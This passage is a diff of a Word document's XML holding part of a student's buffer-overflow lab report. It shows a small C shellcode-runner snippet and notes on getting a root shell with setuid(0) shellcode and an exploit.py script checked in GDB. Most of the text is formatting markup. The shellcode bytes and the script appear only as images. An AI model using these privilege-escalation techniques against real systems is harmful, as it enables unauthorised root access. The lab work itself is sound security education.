+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>char code[500];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>strcpy(code, shellcode);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>int (*func)() = (int(*)())code;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>func();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>return 1;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="12">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>8255</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>264160</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6232525" cy="3521710"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="11" name="Image11" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="11" name="Image11" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6232525" cy="3521710"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> compiled the newly modified call_shellcode.c file:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Observations:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I verified that with the modified shellcode added to the call_shellcode.c file and previously showing that my shell was reverted back to the default shell, the program was successfully able to give me the root shell. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Running the program again without the setuid(0) command results in not having the root shell, but the user shell instead. The Privilege </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
           <w:color w:val="auto"/>
@@ -4133,18 +5430,2048 @@
           <w:szCs w:val="30"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Noto Serif CJK SC" w:cs="Lohit Devanagari" w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
+        <w:t>was dropped from root to user.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Part B:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>I will now begin with trying to gain access to the root shell using the buffer overflow attack. I first update the new shellcode into the exploit.py program. The code is still the same with the added shellcode.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="13">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="1805305"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="12" name="Image12" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="12" name="Image12" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="1805305"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> once again go through GDB to make note of any new memory changes that I will need to update.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="14">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>15875</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-111760</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="2057400"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="13" name="Image13" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="13" name="Image13" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="2057400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>N</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve">o changes to the distance between ebp and buffer and the memory addresses are the same.  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Other than the modified shellcode nothing was changed in the script. Upon running the program again with no changes, I got the user shell instead of the root shell:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="15">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="4116070"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="14" name="Image14" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="14" name="Image14" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="4116070"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
